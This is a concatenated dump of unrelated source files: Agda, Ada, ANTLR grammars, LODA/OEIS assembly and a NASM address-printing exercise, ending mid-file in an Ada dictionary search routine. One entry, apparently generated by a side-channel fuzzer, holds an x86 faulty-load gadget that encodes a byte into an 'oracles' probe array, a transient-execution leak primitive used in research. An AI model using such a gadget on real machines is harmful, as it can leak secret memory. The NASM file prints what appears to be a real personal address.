other/index.agda	zamfofex/lightlib	1	16310	<reponame>zamfofex/lightlib<filename>other/index.agda {-# OPTIONS --omega-in-omega --no-termination-check --overlapping-instances #-} -- This library is licensed under 0BSD. You can read more about it at its GitHub repository: https://github.com/Zambonifofex/lightlib module index where -- The `Light.Libary` file exports modules referencing interface files and other miscellaneous files in the library. import Light.Library -- The `Light.Implementation` file exports modules referencing files that provide an implementation for the interfaces above. import Light.Implementation -- The `Light` file can be used conveniently to use the given implementation for their appropriate interfaces. import Light -- The `Light.Implementation.Standard` file provides an implementation that uses definitions from the standard library: https://github.com/agda/agda-stdlib import Light.Implementation.Standard
formalization/Data/Unsigned.agda	brunoczim/Celeste	1	6348	module Data.Unsigned where open import Data.Bit using (Bit ; b0 ; b1 ; Bits-num ; Overflowing ; _overflow:_ ; result ; carry ; WithCarry ; _with-carry:_ ; toBool ; tryToFinₙ ; !ₙ ) renaming ( _+_ to bit+ ; _-_ to bit- ; ! to bit! ; _&_ to bit& ; _~\|_ to bit\| ; _^_ to bit^ ; _>>_ to bit>> ; _<<_ to bit<< ) open import Data.Unit using (⊤) open import Data.Nat using (ℕ) open import Data.Vec using (Vec; head; replicate) open import Data.Nat.Literal using (Number) open import Data.Maybe using (just; nothing) infixl 8 _-_ _+_ infixl 7 _<<_ _>>_ infixl 6 _&_ infixl 5 _^_ infixl 4 _~\|_ record Unsigned (n : ℕ) : Set where constructor mk-uint field bits : Vec Bit n open Unsigned public instance Unsigned-num : {m : ℕ} → Number (Unsigned m) Unsigned-num {m} .Number.Constraint = Number.Constraint (Bits-num {m}) Unsigned-num {m} .Number.fromNat n ⦃ p ⦄ = mk-uint (mk-bits p) where mk-bits : Number.Constraint (Bits-num {m}) n → Vec Bit m mk-bits p = Number.fromNat Bits-num n ⦃ p ⦄ _+_ : {n : ℕ} → Unsigned n → Unsigned n → Overflowing (Unsigned n) p + q = mk-uint (result sum) overflow: toBool (head (carry sum)) where sum = bit+ (bits p) (bits q) _-_ : {n : ℕ} → Unsigned n → Unsigned n → Overflowing (Unsigned n) p - q = mk-uint (result sub) overflow: toBool (bit! (head (carry sub))) where sub = bit- (bits p) (bits q) rotr : {n : ℕ} → Unsigned n → Unsigned n → WithCarry (Unsigned n) (Unsigned n) rotr {n} (mk-uint ps) (mk-uint qs) = new-result with-carry: new-carry where shifted : WithCarry (Vec Bit n) (Vec Bit n) shifted with tryToFinₙ qs ... \| just i = bit>> ps i ... \| nothing = replicate b0 with-carry: ps new-result : Unsigned n new-result = mk-uint (result shifted) new-carry : Unsigned n new-carry = mk-uint (carry shifted) rotl : {n : ℕ} → Unsigned n → Unsigned n → WithCarry (Unsigned n) (Unsigned n) rotl {n} (mk-uint ps) (mk-uint qs) = new-result with-carry: new-carry where shifted : WithCarry (Vec Bit n) (Vec Bit n) shifted with tryToFinₙ qs ... \| just i = bit<< ps i ... \| nothing = replicate b0 with-carry: ps new-result : Unsigned n new-result = mk-uint (result shifted) new-carry : Unsigned n new-carry = mk-uint (carry shifted) _>>_ : {n : ℕ} → Unsigned n → Unsigned n → Unsigned n ps >> qs = result (rotr ps qs) _<<_ : {n : ℕ} → Unsigned n → Unsigned n → Unsigned n ps << qs = result (rotl ps qs) ! : {n : ℕ} → Unsigned n → Unsigned n ! (mk-uint ps) = mk-uint (!ₙ ps) _&_ : {n : ℕ} → Unsigned n → Unsigned n → Unsigned n (mk-uint ps) & (mk-uint qs) = mk-uint (bit& ps qs) _~\|_ : {n : ℕ} → Unsigned n → Unsigned n → Unsigned n (mk-uint ps) ~\| (mk-uint qs) = mk-uint (bit\| ps qs) _^_ : {n : ℕ} → Unsigned n → Unsigned n → Unsigned n (mk-uint ps) ^ (mk-uint qs) = mk-uint (bit^ ps qs)
Task/Fractal-tree/Ada/fractal-tree.ada	LaudateCorpus1/RosettaCodeData	1	28277	<filename>Task/Fractal-tree/Ada/fractal-tree.ada with Ada.Numerics.Elementary_Functions; with SDL.Video.Windows.Makers; with SDL.Video.Renderers.Makers; with SDL.Video.Rectangles; with SDL.Events.Events; procedure Fractal_Tree is Width : constant := 600; Height : constant := 600; Level : constant := 13; Length : constant := 130.0; X_Start : constant := 475.0; Y_Start : constant := 580.0; A_Start : constant := -1.54; Angle_1 : constant := 0.10; Angle_2 : constant := 0.35; C_1 : constant := 0.71; C_2 : constant := 0.87; Window : SDL.Video.Windows.Window; Renderer : SDL.Video.Renderers.Renderer; Event : SDL.Events.Events.Events; procedure Draw_Tree (Level : in Natural; Length : in Float; Angle : in Float; X, Y : in Float) is use SDL; use Ada.Numerics.Elementary_Functions; Pi : constant := Ada.Numerics.Pi; X_2 : constant Float := X + Length * Cos (Angle, 2.0 * Pi); Y_2 : constant Float := Y + Length * Sin (Angle, 2.0 * Pi); Line : constant SDL.Video.Rectangles.Line_Segment := ((C.int (X), C.int (Y)), (C.int (X_2), C.int (Y_2))); begin if Level > 0 then Renderer.Set_Draw_Colour (Colour => (0, 220, 0, 255)); Renderer.Draw (Line => Line); Draw_Tree (Level - 1, C_1 * Length, Angle + Angle_1, X_2, Y_2); Draw_Tree (Level - 1, C_2 * Length, Angle - Angle_2, X_2, Y_2); end if; end Draw_Tree; procedure Wait is use type SDL.Events.Event_Types; begin loop while SDL.Events.Events.Poll (Event) loop if Event.Common.Event_Type = SDL.Events.Quit then return; end if; end loop; delay 0.100; end loop; end Wait; begin if not SDL.Initialise (Flags => SDL.Enable_Screen) then return; end if; SDL.Video.Windows.Makers.Create (Win => Window, Title => "Fractal tree", Position => SDL.Natural_Coordinates'(X => 10, Y => 10), Size => SDL.Positive_Sizes'(Width, Height), Flags => 0); SDL.Video.Renderers.Makers.Create (Renderer, Window.Get_Surface); Renderer.Set_Draw_Colour ((0, 0, 0, 255)); Renderer.Fill (Rectangle => (0, 0, Width, Height)); Draw_Tree (Level, Length, A_Start, X_Start, Y_Start); Window.Update_Surface; Wait; Window.Finalize; SDL.Finalise; end Fractal_Tree;
Theory-and-Practice-of-Formal-Languages-Parsing/Grammars/Islands/IslandsParser.g4	KvanTTT/Samples	0	7114	parser grammar IslandsParser; options { tokenVocab = IslandsLexer; } htmlDocument : htmlElement* EOF ; htmlElement : OPEN NAME htmlAttribute* CLOSE htmlContent OPEN SLASH NAME CLOSE \| OPEN NAME htmlAttribute* (SLASH_CLOSE \| CLOSE) \| script ; htmlContent : HTML_TEXT? (htmlElement HTML_TEXT?)* ; htmlAttribute : NAME (EQUALS ATTRIBUTE)? ; script : SCRIPT_OPEN SCRIPT_BODY+ SCRIPT_CLOSE ;
programs/oeis/134/A134467.asm	jmorken/loda	1	160091	<filename>programs/oeis/134/A134467.asm ; A134467: a(n) = n(n+1) - A000120(n), where A000120(n) = number of 1's in binary expansion of n. ; 0,1,5,10,19,28,40,53,71,88,108,129,154,179,207,236,271,304,340,377,418,459,503,548,598,647,699,752,809,866,926,987,1055,1120,1188,1257,1330,1403,1479,1556,1638,1719,1803,1888,1977,2066,2158,2251,2350,2447,2547,2648,2753,2858,2966,3075,3189,3302,3418,3535,3656,3777,3901,4026,4159,4288,4420,4553,4690,4827,4967,5108,5254,5399,5547,5696,5849,6002,6158,6315,6478,6639,6803,6968,7137,7306,7478,7651,7829,8006,8186,8367,8552,8737,8925,9114,9310,9503,9699,9896,10097,10298,10502,10707,10917,11126,11338,11551,11768,11985,12205,12426,12653,12878,13106,13335,13568,13801,14037,14274,14516,14757,15001,15246,15495,15744,15996,16249,16511,16768,17028,17289,17554,17819,18087,18356,18630,18903,19179,19456,19737,20018,20302,20587,20878,21167,21459,21752,22049,22346,22646,22947,23253,23558,23866,24175,24488,24801,25117,25434,25758,26079,26403,26728,27057,27386,27718,28051,28389,28726,29066,29407,29752,30097,30445,30794,31149,31502,31858,32215,32576,32937,33301,33666,34036,34405,34777,35150,35527,35904,36284,36665,37054,37439,37827,38216,38609,39002,39398,39795,40197,40598,41002,41407,41816,42225,42637,43050,43469,43886,44306,44727,45152,45577,46005,46434,46868,47301,47737,48174,48615,49056,49500,49945,50397,50846,51298,51751,52208,52665,53125,53586,54052,54517,54985,55454,55927,56400,56876,57353,57836,58317,58801,59286,59775,60264,60756,61249,61747,62244 mov $1,$0 mul $1,$0 lpb $0 div $0,2 add $1,$0 lpe
Validation/pyFrame3DD-master/gcc-master/gcc/ada/libgnarl/s-intman__lynxos.adb	djamal2727/Main-Bearing-Analytical-Model	0	26034	------------------------------------------------------------------------------ -- -- -- GNAT RUN-TIME LIBRARY (GNARL) COMPONENTS -- -- -- -- S Y S T E M . I N T E R R U P T _ M A N A G E M E N T -- -- -- -- B o d y -- -- -- -- Copyright (C) 1992-2020, Free Software Foundation, Inc. -- -- -- -- GNARL is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 3, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. -- -- -- -- As a special exception under Section 7 of GPL version 3, you are granted -- -- additional permissions described in the GCC Runtime Library Exception, -- -- version 3.1, as published by the Free Software Foundation. -- -- -- -- You should have received a copy of the GNU General Public License and -- -- a copy of the GCC Runtime Library Exception along with this program; -- -- see the files COPYING3 and COPYING.RUNTIME respectively. If not, see -- -- <http://www.gnu.org/licenses/>. -- -- -- -- GNARL was developed by the GNARL team at Florida State University. -- -- Extensive contributions were provided by Ada Core Technologies, Inc. -- -- -- ------------------------------------------------------------------------------ -- This is the LynxOS version of this package -- Make a careful study of all signals available under the OS, to see which -- need to be reserved, kept always unmasked, or kept always unmasked. Be on -- the lookout for special signals that may be used by the thread library. -- Since this is a multi target file, the signal <-> exception mapping -- is simple minded. If you need a more precise and target specific -- signal handling, create a new s-intman.adb that will fit your needs. -- This file assumes that: -- SIGFPE, SIGILL, SIGSEGV and SIGBUS exist. They are mapped as follows: -- SIGPFE => Constraint_Error -- SIGILL => Program_Error -- SIGSEGV => Storage_Error -- SIGBUS => Storage_Error -- SIGINT exists and will be kept unmasked unless the pragma -- Unreserve_All_Interrupts is specified anywhere in the application. -- System.OS_Interface contains the following: -- SIGADAABORT: the signal that will be used to abort tasks. -- Unmasked: the OS specific set of signals that should be unmasked in -- all the threads. SIGADAABORT is unmasked by -- default -- Reserved: the OS specific set of signals that are reserved. with System.Task_Primitives; package body System.Interrupt_Management is use Interfaces.C; use System.OS_Interface; type Interrupt_List is array (Interrupt_ID range <>) of Interrupt_ID; Exception_Interrupts : constant Interrupt_List := (SIGFPE, SIGILL, SIGSEGV, SIGBUS); Unreserve_All_Interrupts : Interfaces.C.int; pragma Import (C, Unreserve_All_Interrupts, "__gl_unreserve_all_interrupts"); ----------------------- -- Local Subprograms -- ----------------------- function State (Int : Interrupt_ID) return Character; pragma Import (C, State, "__gnat_get_interrupt_state"); -- Get interrupt state. Defined in init.c The input argument is the -- interrupt number, and the result is one of the following: User : constant Character := 'u'; Runtime : constant Character := 'r'; Default : constant Character := 's'; -- 'n' this interrupt not set by any Interrupt_State pragma -- 'u' Interrupt_State pragma set state to User -- 'r' Interrupt_State pragma set state to Runtime -- 's' Interrupt_State pragma set state to System (use "default" -- system handler) procedure Notify_Exception (signo : Signal; siginfo : System.Address; ucontext : System.Address); -- This function identifies the Ada exception to be raised using the -- information when the system received a synchronous signal. Since this -- function is machine and OS dependent, different code has to be provided -- for different target. ---------------------- -- Notify_Exception -- ---------------------- Signal_Mask : aliased sigset_t; -- The set of signals handled by Notify_Exception procedure Notify_Exception (signo : Signal; siginfo : System.Address; ucontext : System.Address) is pragma Unreferenced (siginfo); Result : Interfaces.C.int; begin -- With the __builtin_longjmp, the signal mask is not restored, so we -- need to restore it explicitly. Result := pthread_sigmask (SIG_UNBLOCK, Signal_Mask'Access, null); pragma Assert (Result = 0); -- Perform the necessary context adjustments prior to a raise -- from a signal handler. Adjust_Context_For_Raise (signo, ucontext); -- Check that treatment of exception propagation here is consistent with -- treatment of the abort signal in System.Task_Primitives.Operations. case signo is when SIGFPE => raise Constraint_Error; when SIGILL => raise Program_Error; when SIGSEGV => raise Storage_Error; when SIGBUS => raise Storage_Error; when others => null; end case; end Notify_Exception; ---------------- -- Initialize -- ---------------- Initialized : Boolean := False; procedure Initialize is act : aliased struct_sigaction; old_act : aliased struct_sigaction; Result : System.OS_Interface.int; Use_Alternate_Stack : constant Boolean := System.Task_Primitives.Alternate_Stack_Size /= 0; -- Whether to use an alternate signal stack for stack overflows begin if Initialized then return; end if; Initialized := True; -- Need to call pthread_init very early because it is doing signal -- initializations. pthread_init; Abort_Task_Interrupt := SIGADAABORT; act.sa_handler := Notify_Exception'Address; -- Setting SA_SIGINFO asks the kernel to pass more than just the signal -- number argument to the handler when it is called. The set of extra -- parameters includes a pointer to the interrupted context, which the -- ZCX propagation scheme needs. -- Most man pages for sigaction mention that sa_sigaction should be set -- instead of sa_handler when SA_SIGINFO is on. In practice, the two -- fields are actually union'ed and located at the same offset. -- On some targets, we set sa_flags to SA_NODEFER so that during the -- handler execution we do not change the Signal_Mask to be masked for -- the Signal. -- This is a temporary fix to the problem that the Signal_Mask is not -- restored after the exception (longjmp) from the handler. The right -- fix should be made in sigsetjmp so that we save the Signal_Set and -- restore it after a longjmp. -- Since SA_NODEFER is obsolete, instead we reset explicitly the mask -- in the exception handler. Result := sigemptyset (Signal_Mask'Access); pragma Assert (Result = 0); -- Add signals that map to Ada exceptions to the mask for J in Exception_Interrupts'Range loop if State (Exception_Interrupts (J)) /= Default then Result := sigaddset (Signal_Mask'Access, Signal (Exception_Interrupts (J))); pragma Assert (Result = 0); end if; end loop; act.sa_mask := Signal_Mask; pragma Assert (Keep_Unmasked = (Interrupt_ID'Range => False)); pragma Assert (Reserve = (Interrupt_ID'Range => False)); -- Process state of exception signals for J in Exception_Interrupts'Range loop if State (Exception_Interrupts (J)) /= User then Keep_Unmasked (Exception_Interrupts (J)) := True; Reserve (Exception_Interrupts (J)) := True; if State (Exception_Interrupts (J)) /= Default then -- This file is identical to s-intman-posix.adb, except that we -- don't set the SA_SIGINFO flag in act.sa_flags, because -- LynxOS does not support that. If SA_SIGINFO is set, then -- sigaction fails, returning -1. act.sa_flags := 0; if Use_Alternate_Stack and then Exception_Interrupts (J) = SIGSEGV then act.sa_flags := act.sa_flags + SA_ONSTACK; end if; Result := sigaction (Signal (Exception_Interrupts (J)), act'Unchecked_Access, old_act'Unchecked_Access); pragma Assert (Result = 0); end if; end if; end loop; if State (Abort_Task_Interrupt) /= User then Keep_Unmasked (Abort_Task_Interrupt) := True; Reserve (Abort_Task_Interrupt) := True; end if; -- Set SIGINT to unmasked state as long as it is not in "User" state. -- Check for Unreserve_All_Interrupts last. if State (SIGINT) /= User then Keep_Unmasked (SIGINT) := True; Reserve (SIGINT) := True; end if; -- Check all signals for state that requires keeping them unmasked and -- reserved. for J in Interrupt_ID'Range loop if State (J) = Default or else State (J) = Runtime then Keep_Unmasked (J) := True; Reserve (J) := True; end if; end loop; -- Add the set of signals that must always be unmasked for this target for J in Unmasked'Range loop Keep_Unmasked (Interrupt_ID (Unmasked (J))) := True; Reserve (Interrupt_ID (Unmasked (J))) := True; end loop; -- Add target-specific reserved signals for J in Reserved'Range loop Reserve (Interrupt_ID (Reserved (J))) := True; end loop; -- Process pragma Unreserve_All_Interrupts. This overrides any settings -- due to pragma Interrupt_State: if Unreserve_All_Interrupts /= 0 then Keep_Unmasked (SIGINT) := False; Reserve (SIGINT) := False; end if; -- We do not really have Signal 0. We just use this value to identify -- non-existent signals (see s-intnam.ads). Therefore, Signal should not -- be used in all signal related operations hence mark it as reserved. Reserve (0) := True; end Initialize; end System.Interrupt_Management;
oeis/273/A273790.asm	neoneye/loda-programs	11	81857	; A273790: Partial sums of the number of active (ON,black) cells in n-th stage of growth of two-dimensional cellular automaton defined by "Rule 931", based on the 5-celled von Neumann neighborhood. ; 1,6,31,80,161,282,451,676,965,1326,1767,2296,2921,3650,4491,5452,6541,7766,9135,10656,12337,14186,16211,18420,20821,23422,26231,29256,32505,35986,39707,43676,47901,52390,57151,62192,67521,73146,79075,85316,91877,98766,105991,113560,121481,129762,138411,147436,156845,166646,176847,187456,198481,209930,221811,234132,246901,260126,273815,287976,302617,317746,333371,349500,366141,383302,400991,419216,437985,457306,477187,497636,518661,540270,562471,585272,608681,632706,657355,682636,708557,735126 mov $2,$0 add $0,3 add $0,$2 bin $0,3 trn $0,5 add $0,1

libsrc/_DEVELOPMENT/arch/zxn/esxdos/c/sdcc_iy/p3dos_cstr_to_pstr.asm

jpoikela/z88dk

640

9080

<reponame>jpoikela/z88dk<gh_stars>100-1000 ; unsigned char *p3dos_cstr_to_pstr(unsigned char *s) SECTION code_esxdos PUBLIC _p3dos_cstr_to_pstr EXTERN asm_p3dos_cstr_to_pstr _p3dos_cstr_to_pstr: pop af pop hl push hl push af jp asm_p3dos_cstr_to_pstr

programs/oeis/056/A056737.asm

neoneye/loda

22

247798

; A056737: Minimum nonnegative integer m such that n = k*(k+m) for some positive integer k. ; 0,1,2,0,4,1,6,2,0,3,10,1,12,5,2,0,16,3,18,1,4,9,22,2,0,11,6,3,28,1,30,4,8,15,2,0,36,17,10,3,40,1,42,7,4,21,46,2,0,5,14,9,52,3,6,1,16,27,58,4,60,29,2,0,8,5,66,13,20,3,70,1,72,35,10,15,4,7,78,2,0,39,82,5,12,41,26,3,88,1,6,19,28,45,14,4,96,7,2,0 mov $2,$0 seq $0,33677 ; Smallest divisor of n >= sqrt(n). mov $1,1 div $2,$0 add $2,1 sub $2,$0 add $2,1 sub $1,$2 mov $0,$1

test/Compiler/simple/Erased-cubical-Pattern-matching-Erased.agda

sseefried/agda

1

8198

{-# OPTIONS --erased-cubical --save-metas #-} module Erased-cubical-Pattern-matching-Erased where open import Agda.Builtin.String open import Erased-cubical-Pattern-matching-Cubical -- If c₁ and c₂ are treated as erased, then f might be compiled to -- something akin to ⊥-elim. However, the main module uses -- --cubical, not --erased-cubical, so f should not be compiled in -- that way. f : D → String f c₁ = "Success\n" f c₂ = "Failure\n"

Transynther/x86/_processed/NONE/_zr_xt_/i3-7100_9_0x84_notsx.log_21829_2424.asm

ljhsiun2/medusa

9

165973

.global s_prepare_buffers s_prepare_buffers: push %r10 push %r11 push %r13 push %r9 push %rsi lea addresses_UC_ht+0xd272, %r9 nop nop nop sub $21575, %rsi movb (%r9), %r13b nop nop nop nop xor %r11, %r11 lea addresses_WC_ht+0x13a72, %r10 nop nop nop cmp %r9, %r9 mov $0x6162636465666768, %r13 movq %r13, %xmm5 movups %xmm5, (%r10) nop nop nop nop nop sub $58566, %rsi pop %rsi pop %r9 pop %r13 pop %r11 pop %r10 ret .global s_faulty_load s_faulty_load: push %r10 push %r14 push %r15 push %rax push %rbp push %rbx push %rdi // Store lea addresses_PSE+0x18432, %r10 nop nop nop nop and $5820, %r15 mov $0x5152535455565758, %rbp movq %rbp, %xmm5 vmovups %ymm5, (%r10) nop nop nop dec %r15 // Faulty Load lea addresses_A+0x3672, %rbp clflush (%rbp) nop nop cmp %rbx, %rbx movb (%rbp), %r14b lea oracles, %rbx and $0xff, %r14 shlq $12, %r14 mov (%rbx,%r14,1), %r14 pop %rdi pop %rbx pop %rbp pop %rax pop %r15 pop %r14 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_A', 'same': False, 'size': 16, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_PSE', 'same': False, 'size': 32, 'congruent': 6, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} [Faulty Load] {'src': {'type': 'addresses_A', 'same': True, 'size': 1, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'type': 'addresses_UC_ht', 'same': False, 'size': 1, 'congruent': 10, 'NT': False, 'AVXalign': True}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_WC_ht', 'same': False, 'size': 16, 'congruent': 6, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'00': 1, '35': 21828} 00 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 */

Whilelang.g4

tealflipper/tinyParser

0

3202

grammar Whilelang; program: seqStatement; seqStatement: statement (';' statement)* ; statement: ID ':=' expression # attrib | 'skip' # skip | 'if' bool 'then' statement 'else' statement # if | 'while' bool 'do' statement # while | 'print' Text # print | 'print' expression # write | '{' seqStatement '}' # block; expression: INT # int | 'read' # read | expression op = ('*' | '/' | '^') expression # MulDivPow | expression op = ('+' | '-') expression # AddSub | op = ('log' | 'ln') expression # log | op = ('sin' | 'cos' | 'tan') expression # trig | op = ('asin' | 'acos' | 'atan') expression # invTrig | 'sqrt' expression # sqrt | FLOAT # float | ID # id | PI # pi | E # euler | '(' expression ')' # parens ; bool: ('true' | 'false') # boolean | expression op='=' expression # relOp | expression op='<=' expression # relOp | 'not' bool # not | bool 'and' bool # and | '(' bool ')' # boolParen; FLOAT: ('0'..'9')+ | ('0'..'9')+ '.' ('0'..'9')* EXPONENT? | '.' ('0'..'9')+ EXPONENT? | ('0'..'9')+ EXPONENT ; EXPONENT: ('e'|'E') ('+'|'-')? ('0'..'9')+ ; MUL: '*'; DIV: '/'; ADD: '+'; SUB: '-'; POW: '^'; LOG10: 'log'; LN: 'ln'; COS: 'cos'; TAN: 'tan'; SIN: 'sin'; ACOS: 'acos'; ASIN: 'asin'; ATAN: 'atan'; SQRT: 'sqrt'; PI: ('pi'); E: 'e'; INT: ('0' ..'9')+; ID: ('a' ..'z')+; Text: '"' .*? '"'; SPACE: [ \t\n\r]+ -> skip;

unordnung_auch_assembler/asm/attiny13/4x4display/allOn.asm

no-go/Blink_atmega328p

0

25850

<filename>unordnung_auch_assembler/asm/attiny13/4x4display/allOn.asm .include "myTiny13.h" ; 0 1 2 3 up = minus ; 4 5 6 7 ; 4 5 6 7 down = minus ; 0 1 2 3 Main: ;initial values ; down up ; \/ ldi A, 0b00011111 ; up- , down- / 7 6 5 4 / 3 2 1 0 out DDRB, A Loop: ; down up ; \/ ldi A, 0b00001000 out PORTB, A ldi A, 0b00001001 out PORTB, A ldi A, 0b00001010 out PORTB, A ldi A, 0b00001011 out PORTB, A ; ----------------------- ; down up ; \/ ldi A, 0b00001100 out PORTB, A ldi A, 0b00001101 out PORTB, A ldi A, 0b00001110 out PORTB, A ldi A, 0b00001111 out PORTB, A ; ----------------------- ; down up ; \/ ldi A, 0b00010100 out PORTB, A ldi A, 0b00010101 out PORTB, A ldi A, 0b00010110 out PORTB, A ldi A, 0b00010111 out PORTB, A ; ----------------------- ; down up ; \/ ldi A, 0b00010000 out PORTB, A ldi A, 0b00010001 out PORTB, A ldi A, 0b00010010 out PORTB, A ldi A, 0b00010011 out PORTB, A ; ----------------------- rjmp Loop

programs/oeis/130/A130784.asm

neoneye/loda

22

82030

<reponame>neoneye/loda<gh_stars>10-100 ; A130784: Period 3: repeat [1, 3, 2]. ; 1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3 mul $0,2 mod $0,3 add $0,1

nasm/assgnment1/p1.asm

codingneverends/assembly

0

169168

<filename>nasm/assgnment1/p1.asm section .data name : db '<NAME>',10 l : equ $-name add1 : db 'Eckamattathil house, Thattakuzha P O',0ah l1 : equ $-add1 add2 : db 'Thattakuzha',0ah l2 : equ $-add2 add3 : db 'Idukki , 685581',0ah l3 : equ $-add3 section .text global _start: _start: mov eax, 4 mov ebx, 1 mov ecx, name mov edx, l int 80h mov eax, 4 mov ebx, 1 mov ecx, add1 mov edx, l1 int 80h mov eax, 4 mov ebx, 1 mov ecx, add2 mov edx, l2 int 80h mov eax, 4 mov ebx, 1 mov ecx, add3 mov edx, l3 int 80h mov eax, 1 mov ebx, 0 int 80h

src/words_engine/words_engine-search_english.adb

spr93/whitakers-words

204

449

-- WORDS, a Latin dictionary, by <NAME> (USAF, Retired) -- -- Copyright <NAME> (1936–2010) -- -- This is a free program, which means it is proper to copy it and pass -- it on to your friends. Consider it a developmental item for which -- there is no charge. However, just for form, it is Copyrighted -- (c). Permission is hereby freely given for any and all use of program -- and data. You can sell it as your own, but at least tell me. -- -- This version is distributed without obligation, but the developer -- would appreciate comments and suggestions. -- -- All parts of the WORDS system, source code and data files, are made freely -- available to anyone who wishes to use them, for whatever purpose. with Ada.Text_IO; use Ada.Text_IO; with Latin_Utils.Strings_Package; use Latin_Utils.Strings_Package; with Latin_Utils.Config; with Support_Utils.Word_Parameters; use Support_Utils.Word_Parameters; with Latin_Utils.Inflections_Package; use Latin_Utils.Inflections_Package; with Latin_Utils.Dictionary_Package; use Latin_Utils.Dictionary_Package; with Support_Utils.Developer_Parameters; use Support_Utils.Developer_Parameters; with Words_Engine.Word_Package; use Words_Engine.Word_Package; with Words_Engine.English_Support_Package; use Words_Engine.English_Support_Package; with Support_Utils.Dictionary_Form; use Latin_Utils; procedure Words_Engine.Search_English (Input_English_Word : String; Pofs : Part_Of_Speech_Type := X) is use Ewds_Direct_Io; Input_Word : Eword := Lower_Case (Head (Input_English_Word, Eword_Size)); Input_Pofs : constant Part_Of_Speech_Type := Pofs; Output_Array : Ewds_Array (1 .. 500) := (others => Null_Ewds_Record); Number_Of_Hits : Integer := 0; J1, J2, J : Ewds_Direct_Io.Count := 0; D_K : constant Dictionary_Kind := General; -- For the moment Ewds : Ewds_Record := Null_Ewds_Record; First_Try, Second_Try : Boolean := True; procedure Load_Output_Array (Ewds : in Ewds_Record) is begin if Ewds.Pofs <= Input_Pofs then Number_Of_Hits := 